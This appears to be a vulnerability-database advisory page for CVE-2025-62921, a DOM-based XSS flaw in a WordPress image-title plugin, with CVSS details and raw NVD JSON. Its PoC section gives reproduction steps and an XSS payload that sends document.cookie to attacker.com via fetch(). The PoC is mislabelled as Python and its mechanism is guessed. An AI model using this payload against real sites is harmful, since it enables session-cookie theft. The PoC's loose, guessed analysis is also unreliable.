Security Vulnerability Report
中文
CVE-2025-62921 CVSS 6.5 MEDIUM

CVE-2025-62921

Published: 2025-10-27 02:15:52
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Pagup Bulk Auto Image Title Attribute bulk-image-title-attribute allows DOM-Based XSS.This issue affects Bulk Auto Image Title Attribute: from n/a through <= 2.0.1.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Pagup Bulk Auto Image Title Attribute <= 2.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-62921 PoC - DOM-based XSS in Bulk Auto Image Title Attribute Plugin // Steps to reproduce: // 1. Install and activate Bulk Auto Image Title Attribute plugin <= 2.0.1 // 2. Upload an image to WordPress Media Library // 3. Edit the image and inject XSS payload in the title field: // <img src=x onerror=alert(document.domain)> // 4. Create or edit a post/page that includes this image // 5. Activate the plugin's auto-title feature // 6. View the post/page - XSS will be executed // Example attack payload: const xssPayload = '<img src=x onerror=fetch(`https://attacker.com/steal?cookie=${document.cookie}`)>'; // Technical analysis: // - Vulnerability exists in how plugin processes image title attributes // - Plugin uses unsafe innerHTML or similar method to insert data // - No HTML entity encoding is performed on user-supplied input // - DOM-based XSS makes server-side WAF ineffective

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62921", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:51.700", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Pagup Bulk Auto Image Title Attribute bulk-image-title-attribute allows DOM-Based XSS.This issue affects Bulk Auto Image Title Attribute: from n/a through <= 2.0.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/bulk-image-title-attribute/vulnerability/wordpress-bulk-auto-image-title-attribute-plugin-2-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}